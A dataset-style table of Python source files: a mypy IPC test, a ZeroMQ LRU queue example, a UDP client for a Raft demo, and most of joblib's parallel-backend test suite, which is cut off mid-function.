source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
testipc.py
|
from unittest import TestCase, main
from multiprocessing import Process, Queue
from mypy.ipc import IPCClient, IPCServer
import pytest
import sys
import time
CONNECTION_NAME = 'dmypy-test-ipc'
def server(msg: str, q: 'Queue[str]') -> None:
server = IPCServer(CONNECTION_NAME)
q.put(server.connection_name)
data = b''
while not data:
with server:
server.write(msg.encode())
data = server.read()
server.cleanup()
class IPCTests(TestCase):
def test_transaction_large(self) -> None:
queue = Queue() # type: Queue[str]
msg = 't' * 200000 # longer than the max read size of 100_000
p = Process(target=server, args=(msg, queue), daemon=True)
p.start()
connection_name = queue.get()
with IPCClient(connection_name, timeout=1) as client:
assert client.read() == msg.encode()
client.write(b'test')
queue.close()
queue.join_thread()
p.join()
def test_connect_twice(self) -> None:
queue = Queue() # type: Queue[str]
msg = 'this is a test message'
p = Process(target=server, args=(msg, queue), daemon=True)
p.start()
connection_name = queue.get()
with IPCClient(connection_name, timeout=1) as client:
assert client.read() == msg.encode()
client.write(b'') # don't let the server hang up yet, we want to connect again.
with IPCClient(connection_name, timeout=1) as client:
assert client.read() == msg.encode()
client.write(b'test')
queue.close()
queue.join_thread()
p.join()
assert p.exitcode == 0
# Run test_connect_twice a lot, in the hopes of finding issues.
# This is really slow, so it is skipped, but can be enabled if
# needed to debug IPC issues.
@pytest.mark.skip
def test_connect_alot(self) -> None:
t0 = time.time()
for i in range(1000):
try:
print(i, 'start')
self.test_connect_twice()
finally:
t1 = time.time()
print(i, t1 - t0)
sys.stdout.flush()
t0 = t1
if __name__ == '__main__':
main()
|
lruqueue2.py
|
"""
Least-recently used (LRU) queue device
Clients and workers are shown here in-process
Author: Guillaume Aubert (gaubert) <guillaume(dot)aubert(at)gmail(dot)com>
"""
import threading
import time
import zmq
NBR_CLIENTS = 10
NBR_WORKERS = 3
def worker_thread(worker_url, context, i):
""" Worker using REQ socket to do LRU routing """
socket = context.socket(zmq.REQ)
identity = "Worker-%d" % (i)
socket.setsockopt(zmq.IDENTITY, identity) #set worker identity
socket.connect(worker_url)
# Tell the borker we are ready for work
socket.send("READY")
try:
while True:
[address, request] = socket.recv_multipart()
print("%s: %s\n" %(identity, request))
socket.send_multipart([address, "", "OK"])
except zmq.ZMQError, zerr:
# context terminated so quit silently
if zerr.strerror == 'Context was terminated':
return
else:
raise zerr
def client_thread(client_url, context, i):
""" Basic request-reply client using REQ socket """
socket = context.socket(zmq.REQ)
identity = "Client-%d" % (i)
socket.setsockopt(zmq.IDENTITY, identity) #Set client identity. Makes tracing easier
socket.connect(client_url)
# Send request, get reply
socket.send("HELLO")
reply = socket.recv()
print("%s: %s\n" % (identity, reply))
return
def main():
""" main method """
url_worker = "inproc://workers"
url_client = "inproc://clients"
client_nbr = NBR_CLIENTS
# Prepare our context and sockets
context = zmq.Context(1)
frontend = context.socket(zmq.XREP)
frontend.bind(url_client)
backend = context.socket(zmq.XREP)
backend.bind(url_worker)
# create workers and clients threads
for i in range(NBR_WORKERS):
thread = threading.Thread(target=worker_thread, args=(url_worker, context, i, ))
thread.start()
for i in range(NBR_CLIENTS):
thread_c = threading.Thread(target=client_thread, args=(url_client, context, i, ))
thread_c.start()
# Logic of LRU loop
# - Poll backend always, frontend only if 1+ worker ready
# - If worker replies, queue worker as ready and forward reply
# to client if necessary
# - If client requests, pop next worker and send request to it
# Queue of available workers
available_workers = 0
workers_list = []
# init poller
poller = zmq.Poller()
# Always poll for worker activity on backend
poller.register(backend, zmq.POLLIN)
# Poll front-end only if we have available workers
poller.register(frontend, zmq.POLLIN)
while True:
socks = dict(poller.poll())
# Handle worker activity on backend
if (backend in socks and socks[backend] == zmq.POLLIN):
# Queue worker address for LRU routing
message = backend.recv_multipart()
assert available_workers < NBR_WORKERS
worker_addr = message[0]
# add worker back to the list of workers
available_workers += 1
workers_list.append(worker_addr)
# Second frame is empty
empty = message[1]
assert empty == ""
# Third frame is READY or else a client reply address
client_addr = message[2]
# If client reply, send rest back to frontend
if client_addr != "READY":
# Following frame is empty
empty = message[3]
assert empty == ""
reply = message[4]
frontend.send_multipart([client_addr, "", reply])
client_nbr -= 1
if client_nbr == 0:
break # Exit after N messages
# poll on frontend only if workers are available
if available_workers > 0:
if (frontend in socks and socks[frontend] == zmq.POLLIN):
# Now get next client request, route to LRU worker
# Client request is [address][empty][request]
[client_addr, empty, request ] = frontend.recv_multipart()
assert empty == ""
# Dequeue and drop the next worker address
available_workers -= 1
worker_id = workers_list.pop()
backend.send_multipart([worker_id, "", client_addr, request])
#out of infinite loop: do some housekeeping
time.sleep (1)
frontend.close()
backend.close()
context.term()
if __name__ == "__main__":
main()
|
client.py
|
# coding: utf-8
__author__ = 'zhenhang.sun@gmail.com'
__version__ = '1.0.0'
import time
import json
import socket
import random
from multiprocessing import Process
def send():
cs = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
servers = [
('localhost', 10001),
('localhost', 10002),
('localhost', 10003)
]
while True:
addr = random.choice(servers)
data = {'type': 'client_append_entries', 'timestamp': int(time.time())}
print('send: ', data)
data = json.dumps(data).encode('utf-8')
cs.sendto(data, addr)
time.sleep(10)
def recv():
addr = ('localhost', 10000)
ss = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ss.bind(addr)
while True:
data, addr = ss.recvfrom(65535)
data = json.loads(data)
print('recv: ' + str(data['index']) + ' has been committed')
if __name__ == '__main__':
p1 = Process(target=send, name='send', daemon=True)
p1.start()
p2 = Process(target=recv, name='recv', daemon=True)
p2.start()
p1.join()
p2.join()
|
test_parallel.py
|
"""
Test the parallel module.
"""
# Author: Gael Varoquaux <gael dot varoquaux at normalesup dot org>
# Copyright (c) 2010-2011 Gael Varoquaux
# License: BSD Style, 3 clauses.
import os
import sys
import time
import mmap
import threading
from traceback import format_exception
from math import sqrt
from time import sleep
from pickle import PicklingError
from multiprocessing import TimeoutError
import pytest
import joblib
from joblib import parallel
from joblib import dump, load
from joblib.externals.loky import get_reusable_executor
from joblib.test.common import np, with_numpy
from joblib.test.common import with_multiprocessing
from joblib.testing import (parametrize, raises, check_subprocess_call,
skipif, SkipTest, warns)
from joblib._compat import PY3_OR_LATER, PY27
try:
import cPickle as pickle
except ImportError:
import pickle
try:
from queue import Queue
except ImportError:
# Backward compat
from Queue import Queue
try:
import posix
except ImportError:
posix = None
try:
RecursionError
except NameError:
RecursionError = RuntimeError
try:
reload # Python 2
except NameError: # Python 3
from importlib import reload
try:
from ._openmp_test_helper.parallel_sum import parallel_sum
except ImportError:
parallel_sum = None
try:
import distributed
except ImportError:
distributed = None
from joblib._parallel_backends import SequentialBackend
from joblib._parallel_backends import ThreadingBackend
from joblib._parallel_backends import MultiprocessingBackend
from joblib._parallel_backends import ParallelBackendBase
from joblib._parallel_backends import LokyBackend
from joblib._parallel_backends import SafeFunction
from joblib.parallel import Parallel, delayed
from joblib.parallel import register_parallel_backend, parallel_backend
from joblib.parallel import effective_n_jobs, cpu_count
from joblib.parallel import mp, BACKENDS, DEFAULT_BACKEND, EXTERNAL_BACKENDS
from joblib.my_exceptions import JoblibException
from joblib.my_exceptions import TransportableException
from joblib.my_exceptions import JoblibValueError
from joblib.my_exceptions import WorkerInterrupt
ALL_VALID_BACKENDS = [None] + sorted(BACKENDS.keys())
# Add instances of backend classes deriving from ParallelBackendBase
ALL_VALID_BACKENDS += [BACKENDS[backend_str]() for backend_str in BACKENDS]
PROCESS_BACKENDS = ['multiprocessing', 'loky']
PARALLEL_BACKENDS = PROCESS_BACKENDS + ['threading']
if hasattr(mp, 'get_context'):
# Custom multiprocessing context in Python 3.4+
ALL_VALID_BACKENDS.append(mp.get_context('spawn'))
DefaultBackend = BACKENDS[DEFAULT_BACKEND]
def get_workers(backend):
return getattr(backend, '_pool', getattr(backend, '_workers', None))
def division(x, y):
return x / y
def square(x):
return x ** 2
class MyExceptionWithFinickyInit(Exception):
"""An exception class with non trivial __init__
"""
def __init__(self, a, b, c, d):
pass
def exception_raiser(x, custom_exception=False):
if x == 7:
raise (MyExceptionWithFinickyInit('a', 'b', 'c', 'd')
if custom_exception else ValueError)
return x
def interrupt_raiser(x):
time.sleep(.05)
raise KeyboardInterrupt
def f(x, y=0, z=0):
""" A module-level function so that it can be spawn with
multiprocessing.
"""
return x ** 2 + y + z
def _active_backend_type():
return type(parallel.get_active_backend()[0])
def parallel_func(inner_n_jobs, backend):
return Parallel(n_jobs=inner_n_jobs, backend=backend)(
delayed(square)(i) for i in range(3))
###############################################################################
def test_cpu_count():
assert cpu_count() > 0
def test_effective_n_jobs():
assert effective_n_jobs() > 0
@pytest.mark.parametrize(
"backend_n_jobs, expected_n_jobs",
[(3, 3), (-1, effective_n_jobs(n_jobs=-1)), (None, 1)],
ids=["positive-int", "negative-int", "None"]
)
@with_multiprocessing
def test_effective_n_jobs_None(backend_n_jobs, expected_n_jobs):
# check the number of effective jobs when `n_jobs=None`
# non-regression test for https://github.com/joblib/joblib/issues/984
with parallel_backend("threading", n_jobs=backend_n_jobs):
# when using a backend, the default of number jobs will be the one set
# in the backend
assert effective_n_jobs(n_jobs=None) == expected_n_jobs
# without any backend, None will default to a single job
assert effective_n_jobs(n_jobs=None) == 1
###############################################################################
# Test parallel
@parametrize('backend', ALL_VALID_BACKENDS)
@parametrize('n_jobs', [1, 2, -1, -2])
@parametrize('verbose', [2, 11, 100])
def test_simple_parallel(backend, n_jobs, verbose):
assert ([square(x) for x in range(5)] ==
Parallel(n_jobs=n_jobs, backend=backend,
verbose=verbose)(
delayed(square)(x) for x in range(5)))
@parametrize('backend', ALL_VALID_BACKENDS)
def test_main_thread_renamed_no_warning(backend, monkeypatch):
# Check that no default backend relies on the name of the main thread:
# https://github.com/joblib/joblib/issues/180#issuecomment-253266247
# Some programs use a different name for the main thread. This is the case
# for uWSGI apps for instance.
monkeypatch.setattr(target=threading.current_thread(), name='name',
value='some_new_name_for_the_main_thread')
with warns(None) as warninfo:
results = Parallel(n_jobs=2, backend=backend)(
delayed(square)(x) for x in range(3))
assert results == [0, 1, 4]
# Due to the default parameters of LokyBackend, there is a chance that
# warninfo catches Warnings from worker timeouts. We remove it if it exists
warninfo = [w for w in warninfo if "worker timeout" not in str(w.message)]
# The multiprocessing backend will raise a warning when detecting that is
# started from the non-main thread. Let's check that there is no false
# positive because of the name change.
assert len(warninfo) == 0
def _assert_warning_nested(backend, inner_n_jobs, expected):
with warns(None) as records:
parallel_func(backend=backend, inner_n_jobs=inner_n_jobs)
if expected:
# with threading, we might see more that one records
if len(records) > 0:
return 'backed parallel loops cannot' in records[0].message.args[0]
return False
else:
assert len(records) == 0
return True
@with_multiprocessing
@parametrize('parent_backend,child_backend,expected', [
('loky', 'multiprocessing', True), ('loky', 'loky', False),
('multiprocessing', 'multiprocessing', True),
('multiprocessing', 'loky', True),
('threading', 'multiprocessing', True),
('threading', 'loky', True),
])
def test_nested_parallel_warnings(parent_backend, child_backend, expected):
# no warnings if inner_n_jobs=1
Parallel(n_jobs=2, backend=parent_backend)(
delayed(_assert_warning_nested)(
backend=child_backend, inner_n_jobs=1,
expected=False)
for _ in range(5))
# warnings if inner_n_jobs != 1 and expected
res = Parallel(n_jobs=2, backend=parent_backend)(
delayed(_assert_warning_nested)(
backend=child_backend, inner_n_jobs=2,
expected=expected)
for _ in range(5))
# warning handling is not thread safe. One thread might see multiple
# warning or no warning at all.
if parent_backend == "threading":
assert any(res)
else:
assert all(res)
@with_multiprocessing
@parametrize('backend', ['loky', 'multiprocessing', 'threading'])
def test_background_thread_parallelism(backend):
is_run_parallel = [False]
def background_thread(is_run_parallel):
with warns(None) as records:
Parallel(n_jobs=2)(
delayed(sleep)(.1) for _ in range(4))
print(len(records))
is_run_parallel[0] = len(records) == 0
t = threading.Thread(target=background_thread, args=(is_run_parallel,))
t.start()
t.join()
assert is_run_parallel[0]
def nested_loop(backend):
Parallel(n_jobs=2, backend=backend)(
delayed(square)(.01) for _ in range(2))
@parametrize('child_backend', BACKENDS)
@parametrize('parent_backend', BACKENDS)
def test_nested_loop(parent_backend, child_backend):
Parallel(n_jobs=2, backend=parent_backend)(
delayed(nested_loop)(child_backend) for _ in range(2))
def raise_exception(backend):
raise ValueError
def test_nested_loop_with_exception_with_loky():
with raises(ValueError):
with Parallel(n_jobs=2, backend="loky") as parallel:
parallel([delayed(nested_loop)("loky"),
delayed(raise_exception)("loky")])
def test_mutate_input_with_threads():
"""Input is mutable when using the threading backend"""
q = Queue(maxsize=5)
Parallel(n_jobs=2, backend="threading")(
delayed(q.put)(1) for _ in range(5))
assert q.full()
@parametrize('n_jobs', [1, 2, 3])
def test_parallel_kwargs(n_jobs):
"""Check the keyword argument processing of pmap."""
lst = range(10)
assert ([f(x, y=1) for x in lst] ==
Parallel(n_jobs=n_jobs)(delayed(f)(x, y=1) for x in lst))
@parametrize('backend', PARALLEL_BACKENDS)
def test_parallel_as_context_manager(backend):
lst = range(10)
expected = [f(x, y=1) for x in lst]
with Parallel(n_jobs=4, backend=backend) as p:
# Internally a pool instance has been eagerly created and is managed
# via the context manager protocol
managed_backend = p._backend
# We make call with the managed parallel object several times inside
# the managed block:
assert expected == p(delayed(f)(x, y=1) for x in lst)
assert expected == p(delayed(f)(x, y=1) for x in lst)
# Those calls have all used the same pool instance:
if mp is not None:
assert get_workers(managed_backend) is get_workers(p._backend)
# As soon as we exit the context manager block, the pool is terminated and
# no longer referenced from the parallel object:
if mp is not None:
assert get_workers(p._backend) is None
# It's still possible to use the parallel instance in non-managed mode:
assert expected == p(delayed(f)(x, y=1) for x in lst)
if mp is not None:
assert get_workers(p._backend) is None
@with_multiprocessing
def test_parallel_pickling():
""" Check that pmap captures the errors when it is passed an object
that cannot be pickled.
"""
class UnpicklableObject(object):
def __reduce__(self):
raise RuntimeError('123')
with raises(PicklingError, match=r"the task to send"):
Parallel(n_jobs=2)(delayed(id)(UnpicklableObject()) for _ in range(10))
@parametrize('backend', PARALLEL_BACKENDS)
def test_parallel_timeout_success(backend):
# Check that timeout isn't thrown when function is fast enough
assert len(Parallel(n_jobs=2, backend=backend, timeout=10)(
delayed(sleep)(0.001) for x in range(10))) == 10
@with_multiprocessing
@parametrize('backend', PARALLEL_BACKENDS)
def test_parallel_timeout_fail(backend):
# Check that timeout properly fails when function is too slow
with raises(TimeoutError):
Parallel(n_jobs=2, backend=backend, timeout=0.01)(
delayed(sleep)(10) for x in range(10))
@with_multiprocessing
@parametrize('backend', PROCESS_BACKENDS)
def test_error_capture(backend):
# Check that error are captured, and that correct exceptions
# are raised.
if mp is not None:
with raises(ZeroDivisionError):
Parallel(n_jobs=2, backend=backend)(
[delayed(division)(x, y)
for x, y in zip((0, 1), (1, 0))])
with raises(WorkerInterrupt):
Parallel(n_jobs=2, backend=backend)(
[delayed(interrupt_raiser)(x) for x in (1, 0)])
# Try again with the context manager API
with Parallel(n_jobs=2, backend=backend) as parallel:
assert get_workers(parallel._backend) is not None
original_workers = get_workers(parallel._backend)
with raises(ZeroDivisionError):
parallel([delayed(division)(x, y)
for x, y in zip((0, 1), (1, 0))])
# The managed pool should still be available and be in a working
# state despite the previously raised (and caught) exception
assert get_workers(parallel._backend) is not None
# The pool should have been interrupted and restarted:
assert get_workers(parallel._backend) is not original_workers
assert ([f(x, y=1) for x in range(10)] ==
parallel(delayed(f)(x, y=1) for x in range(10)))
original_workers = get_workers(parallel._backend)
with raises(WorkerInterrupt):
parallel([delayed(interrupt_raiser)(x) for x in (1, 0)])
# The pool should still be available despite the exception
assert get_workers(parallel._backend) is not None
# The pool should have been interrupted and restarted:
assert get_workers(parallel._backend) is not original_workers
assert ([f(x, y=1) for x in range(10)] ==
parallel(delayed(f)(x, y=1) for x in range(10)))
# Check that the inner pool has been terminated when exiting the
# context manager
assert get_workers(parallel._backend) is None
else:
with raises(KeyboardInterrupt):
Parallel(n_jobs=2)(
[delayed(interrupt_raiser)(x) for x in (1, 0)])
# wrapped exceptions should inherit from the class of the original
# exception to make it easy to catch them
with raises(ZeroDivisionError):
Parallel(n_jobs=2)(
[delayed(division)(x, y) for x, y in zip((0, 1), (1, 0))])
with raises(MyExceptionWithFinickyInit):
Parallel(n_jobs=2, verbose=0)(
(delayed(exception_raiser)(i, custom_exception=True)
for i in range(30)))
try:
# JoblibException wrapping is disabled in sequential mode:
Parallel(n_jobs=1)(
delayed(division)(x, y) for x, y in zip((0, 1), (1, 0)))
except Exception as ex:
assert not isinstance(ex, JoblibException)
else:
raise ValueError("The excepted error has not been raised.")
def consumer(queue, item):
queue.append('Consumed %s' % item)
@parametrize('backend', BACKENDS)
@parametrize('batch_size, expected_queue',
[(1, ['Produced 0', 'Consumed 0',
'Produced 1', 'Consumed 1',
'Produced 2', 'Consumed 2',
'Produced 3', 'Consumed 3',
'Produced 4', 'Consumed 4',
'Produced 5', 'Consumed 5']),
(4, [ # First Batch
'Produced 0', 'Produced 1', 'Produced 2', 'Produced 3',
'Consumed 0', 'Consumed 1', 'Consumed 2', 'Consumed 3',
# Second batch
'Produced 4', 'Produced 5', 'Consumed 4', 'Consumed 5'])])
def test_dispatch_one_job(backend, batch_size, expected_queue):
""" Test that with only one job, Parallel does act as a iterator.
"""
queue = list()
def producer():
for i in range(6):
queue.append('Produced %i' % i)
yield i
Parallel(n_jobs=1, batch_size=batch_size, backend=backend)(
delayed(consumer)(queue, x) for x in producer())
assert queue == expected_queue
assert len(queue) == 12
@with_multiprocessing
@parametrize('backend', PARALLEL_BACKENDS)
def test_dispatch_multiprocessing(backend):
""" Check that using pre_dispatch Parallel does indeed dispatch items
lazily.
"""
manager = mp.Manager()
queue = manager.list()
def producer():
for i in range(6):
queue.append('Produced %i' % i)
yield i
Parallel(n_jobs=2, batch_size=1, pre_dispatch=3, backend=backend)(
delayed(consumer)(queue, 'any') for _ in producer())
queue_contents = list(queue)
assert queue_contents[0] == 'Produced 0'
# Only 3 tasks are pre-dispatched out of 6. The 4th task is dispatched only
# after any of the first 3 jobs have completed.
first_consumption_index = queue_contents[:4].index('Consumed any')
assert first_consumption_index > -1
produced_3_index = queue_contents.index('Produced 3') # 4th task produced
assert produced_3_index > first_consumption_index
assert len(queue) == 12
def test_batching_auto_threading():
# batching='auto' with the threading backend leaves the effective batch
# size to 1 (no batching) as it has been found to never be beneficial with
# this low-overhead backend.
with Parallel(n_jobs=2, batch_size='auto', backend='threading') as p:
p(delayed(id)(i) for i in range(5000)) # many very fast tasks
assert p._backend.compute_batch_size() == 1
@with_multiprocessing
@parametrize('backend', PROCESS_BACKENDS)
def test_batching_auto_subprocesses(backend):
with Parallel(n_jobs=2, batch_size='auto', backend=backend) as p:
p(delayed(id)(i) for i in range(5000)) # many very fast tasks
# It should be strictly larger than 1 but as we don't want heisen
# failures on clogged CI worker environment be safe and only check that
# it's a strictly positive number.
assert p._backend.compute_batch_size() > 0
def test_exception_dispatch():
"""Make sure that exception raised during dispatch are indeed captured"""
with raises(ValueError):
Parallel(n_jobs=2, pre_dispatch=16, verbose=0)(
delayed(exception_raiser)(i) for i in range(30))
def nested_function_inner(i):
Parallel(n_jobs=2)(
delayed(exception_raiser)(j) for j in range(30))
def nested_function_outer(i):
Parallel(n_jobs=2)(
delayed(nested_function_inner)(j) for j in range(30))
@with_multiprocessing
@parametrize('backend', PARALLEL_BACKENDS)
def test_nested_exception_dispatch(backend):
"""Ensure errors for nested joblib cases gets propagated
For Python 2.7, the TransportableException wrapping and unwrapping should
preserve the traceback information of the inner function calls.
For Python 3, we rely on the built-in __cause__ system that already
report this kind of information to the user.
"""
if PY27 and backend == 'multiprocessing':
raise SkipTest("Nested parallel calls can deadlock with the python 2.7"
"multiprocessing backend.")
with raises(ValueError) as excinfo:
Parallel(n_jobs=2, backend=backend)(
delayed(nested_function_outer)(i) for i in range(30))
# Check that important information such as function names are visible
# in the final error message reported to the user
report_lines = format_exception(excinfo.type, excinfo.value, excinfo.tb)
report = "".join(report_lines)
assert 'nested_function_outer' in report
assert 'nested_function_inner' in report
assert 'exception_raiser' in report
if PY3_OR_LATER:
# Under Python 3, there is no need for exception wrapping as the
# exception raised in a worker process is transportable by default and
# preserves the necessary information via the `__cause__` attribute.
assert type(excinfo.value) is ValueError
else:
# The wrapping mechanism used to make exception of Python2.7
# transportable does not create a JoblibJoblibJoblibValueError
# despite the 3 nested parallel calls.
assert type(excinfo.value) is JoblibValueError
def _reload_joblib():
# Retrieve the path of the parallel module in a robust way
joblib_path = Parallel.__module__.split(os.sep)
joblib_path = joblib_path[:1]
joblib_path.append('parallel.py')
joblib_path = '/'.join(joblib_path)
module = __import__(joblib_path)
# Reload the module. This should trigger a fail
reload(module)
def test_multiple_spawning():
# Test that attempting to launch a new Python after spawned
# subprocesses will raise an error, to avoid infinite loops on
# systems that do not support fork
if not int(os.environ.get('JOBLIB_MULTIPROCESSING', 1)):
raise SkipTest()
with raises(ImportError):
Parallel(n_jobs=2, pre_dispatch='all')(
[delayed(_reload_joblib)() for i in range(10)])
class FakeParallelBackend(SequentialBackend):
"""Pretends to run concurrently while running sequentially."""
def configure(self, n_jobs=1, parallel=None, **backend_args):
self.n_jobs = self.effective_n_jobs(n_jobs)
self.parallel = parallel
return n_jobs
def effective_n_jobs(self, n_jobs=1):
if n_jobs < 0:
n_jobs = max(mp.cpu_count() + 1 + n_jobs, 1)
return n_jobs
def test_invalid_backend():
with raises(ValueError):
Parallel(backend='unit-testing')
@parametrize('backend', ALL_VALID_BACKENDS)
def test_invalid_njobs(backend):
with raises(ValueError) as excinfo:
Parallel(n_jobs=0, backend=backend)._initialize_backend()
assert "n_jobs == 0 in Parallel has no meaning" in str(excinfo.value)
def test_register_parallel_backend():
try:
register_parallel_backend("test_backend", FakeParallelBackend)
assert "test_backend" in BACKENDS
assert BACKENDS["test_backend"] == FakeParallelBackend
finally:
del BACKENDS["test_backend"]
def test_overwrite_default_backend():
assert _active_backend_type() == DefaultBackend
try:
register_parallel_backend("threading", BACKENDS["threading"],
make_default=True)
assert _active_backend_type() == ThreadingBackend
finally:
# Restore the global default manually
parallel.DEFAULT_BACKEND = DEFAULT_BACKEND
assert _active_backend_type() == DefaultBackend
def check_backend_context_manager(backend_name):
with parallel_backend(backend_name, n_jobs=3):
active_backend, active_n_jobs = parallel.get_active_backend()
assert active_n_jobs == 3
assert effective_n_jobs(3) == 3
p = Parallel()
assert p.n_jobs == 3
if backend_name == 'multiprocessing':
assert type(active_backend) == MultiprocessingBackend
assert type(p._backend) == MultiprocessingBackend
elif backend_name == 'loky':
assert type(active_backend) == LokyBackend
assert type(p._backend) == LokyBackend
elif backend_name == 'threading':
assert type(active_backend) == ThreadingBackend
assert type(p._backend) == ThreadingBackend
elif backend_name.startswith('test_'):
assert type(active_backend) == FakeParallelBackend
assert type(p._backend) == FakeParallelBackend
all_backends_for_context_manager = PARALLEL_BACKENDS[:]
all_backends_for_context_manager.extend(
['test_backend_%d' % i for i in range(3)]
)
@with_multiprocessing
@parametrize('backend', all_backends_for_context_manager)
def test_backend_context_manager(monkeypatch, backend):
if backend not in BACKENDS:
monkeypatch.setitem(BACKENDS, backend, FakeParallelBackend)
assert _active_backend_type() == DefaultBackend
# check that this possible to switch parallel backends sequentially
check_backend_context_manager(backend)
# The default backend is restored
assert _active_backend_type() == DefaultBackend
# Check that context manager switching is thread safe:
Parallel(n_jobs=2, backend='threading')(
delayed(check_backend_context_manager)(b)
for b in all_backends_for_context_manager if not b)
# The default backend is again restored
assert _active_backend_type() == DefaultBackend
class ParameterizedParallelBackend(SequentialBackend):
"""Pretends to run conncurrently while running sequentially."""
def __init__(self, param=None):
if param is None:
raise ValueError('param should not be None')
self.param = param
def test_parameterized_backend_context_manager(monkeypatch):
monkeypatch.setitem(BACKENDS, 'param_backend',
ParameterizedParallelBackend)
assert _active_backend_type() == DefaultBackend
with parallel_backend('param_backend', param=42, n_jobs=3):
active_backend, active_n_jobs = parallel.get_active_backend()
assert type(active_backend) == ParameterizedParallelBackend
assert active_backend.param == 42
assert active_n_jobs == 3
p = Parallel()
assert p.n_jobs == 3
assert p._backend is active_backend
results = p(delayed(sqrt)(i) for i in range(5))
assert results == [sqrt(i) for i in range(5)]
# The default backend is again restored
assert _active_backend_type() == DefaultBackend
def test_directly_parameterized_backend_context_manager():
assert _active_backend_type() == DefaultBackend
# Check that it's possible to pass a backend instance directly,
# without registration
with parallel_backend(ParameterizedParallelBackend(param=43), n_jobs=5):
active_backend, active_n_jobs = parallel.get_active_backend()
assert type(active_backend) == ParameterizedParallelBackend
assert active_backend.param == 43
assert active_n_jobs == 5
p = Parallel()
assert p.n_jobs == 5
assert p._backend is active_backend
results = p(delayed(sqrt)(i) for i in range(5))
assert results == [sqrt(i) for i in range(5)]
# The default backend is again restored
assert _active_backend_type() == DefaultBackend
def sleep_and_return_pid():
sleep(.1)
return os.getpid()
def get_nested_pids():
assert _active_backend_type() == ThreadingBackend
# Assert that the nested backend does not change the default number of
# jobs used in Parallel
assert Parallel()._effective_n_jobs() == 1
# Assert that the tasks are running only on one process
return Parallel(n_jobs=2)(delayed(sleep_and_return_pid)()
for _ in range(2))
class MyBackend(joblib._parallel_backends.LokyBackend):
"""Backend to test backward compatibility with older backends"""
def get_nested_backend(self, ):
# Older backends only return a backend, without n_jobs indications.
return super(MyBackend, self).get_nested_backend()[0]
register_parallel_backend('back_compat_backend', MyBackend)
@with_multiprocessing
@parametrize('backend', ['threading', 'loky', 'multiprocessing',
'back_compat_backend'])
def test_nested_backend_context_manager(backend):
# Check that by default, nested parallel calls will always use the
# ThreadingBackend
with parallel_backend(backend):
pid_groups = Parallel(n_jobs=2)(
delayed(get_nested_pids)()
for _ in range(10)
)
for pid_group in pid_groups:
assert len(set(pid_group)) == 1
@with_multiprocessing
@parametrize('n_jobs', [2, -1, None])
@parametrize('backend', PARALLEL_BACKENDS)
def test_nested_backend_in_sequential(backend, n_jobs):
# Check that by default, nested parallel calls will always use the
# ThreadingBackend
def check_nested_backend(expected_backend_type, expected_n_job):
# Assert that the sequential backend at top level, does not change the
# backend for nested calls.
assert _active_backend_type() == BACKENDS[expected_backend_type]
# Assert that the nested backend in SequentialBackend does not change
# the default number of jobs used in Parallel
expected_n_job = effective_n_jobs(expected_n_job)
assert Parallel()._effective_n_jobs() == expected_n_job
Parallel(n_jobs=1)(
delayed(check_nested_backend)('loky', 1)
for _ in range(10)
)
with parallel_backend(backend, n_jobs=n_jobs):
Parallel(n_jobs=1)(
delayed(check_nested_backend)(backend, n_jobs)
for _ in range(10)
)
def check_nesting_level(inner_backend, expected_level):
with parallel_backend(inner_backend) as (backend, n_jobs):
assert backend.nesting_level == expected_level
@with_multiprocessing
@parametrize('outer_backend', PARALLEL_BACKENDS)
@parametrize('inner_backend', PARALLEL_BACKENDS)
def test_backend_nesting_level(outer_backend, inner_backend):
# Check that the nesting level for the backend is correctly set
check_nesting_level(outer_backend, 0)
Parallel(n_jobs=2, backend=outer_backend)(
delayed(check_nesting_level)(inner_backend, 1)
for _ in range(10)
)
with parallel_backend(inner_backend, n_jobs=2):
Parallel()(delayed(check_nesting_level)(inner_backend, 1)
for _ in range(10))
@with_multiprocessing
def test_retrieval_context():
import contextlib
class MyBackend(ThreadingBackend):
i = 0
@contextlib.contextmanager
def retrieval_context(self):
self.i += 1
yield
register_parallel_backend("retrieval", MyBackend)
def nested_call(n):
return Parallel(n_jobs=2)(delayed(id)(i) for i in range(n))
with parallel_backend("retrieval") as (ba, _):
Parallel(n_jobs=2)(
delayed(nested_call, check_pickle=False)(i)
for i in range(5)
)
assert ba.i == 1
###############################################################################
# Test helpers
def test_joblib_exception():
# Smoke-test the custom exception
e = JoblibException('foobar')
# Test the repr
repr(e)
# Test the pickle
pickle.dumps(e)
def test_safe_function():
safe_division = SafeFunction(division)
if PY3_OR_LATER:
with raises(ZeroDivisionError):
safe_division(1, 0)
else:
# Under Python 2.7, exception are wrapped with a special wrapper to
# preserve runtime information of the worker environment. Python 3 does
# not need this as it preserves the traceback information by default.
with raises(TransportableException) as excinfo:
safe_division(1, 0)
assert isinstance(excinfo.value.unwrap(), ZeroDivisionError)
safe_interrupt = SafeFunction(interrupt_raiser)
with raises(WorkerInterrupt):
safe_interrupt('x')
@parametrize('batch_size', [0, -1, 1.42])
def test_invalid_batch_size(batch_size):
with raises(ValueError):
Parallel(batch_size=batch_size)
@parametrize('n_tasks, n_jobs, pre_dispatch, batch_size',
[(2, 2, 'all', 'auto'),
(2, 2, 'n_jobs', 'auto'),
(10, 2, 'n_jobs', 'auto'),
(517, 2, 'n_jobs', 'auto'),
(10, 2, 'n_jobs', 'auto'),
(10, 4, 'n_jobs', 'auto'),
(200, 12, 'n_jobs', 'auto'),
(25, 12, '2 * n_jobs', 1),
(250, 12, 'all', 1),
(250, 12, '2 * n_jobs', 7),
(200, 12, '2 * n_jobs', 'auto')])
def test_dispatch_race_condition(n_tasks, n_jobs, pre_dispatch, batch_size):
# Check that using (async-)dispatch does not yield a race condition on the
# iterable generator that is not thread-safe natively.
# This is a non-regression test for the "Pool seems closed" class of error
params = {'n_jobs': n_jobs, 'pre_dispatch': pre_dispatch,
'batch_size': batch_size}
expected = [square(i) for i in range(n_tasks)]
results = Parallel(**params)(delayed(square)(i) for i in range(n_tasks))
assert results == expected
@with_multiprocessing
@skipif(sys.version_info < (3, 5), reason="Bored with Python 2 support")
def test_default_mp_context():
mp_start_method = mp.get_start_method()
p = Parallel(n_jobs=2, backend='multiprocessing')
context = p._backend_args.get('context')
if sys.version_info >= (3, 5):
start_method = context.get_start_method()
assert start_method == mp_start_method
else:
assert context is None
@with_numpy
@with_multiprocessing
@parametrize('backend', PROCESS_BACKENDS)
def test_no_blas_crash_or_freeze_with_subprocesses(backend):
if backend == 'multiprocessing':
if sys.version_info < (3, 4):
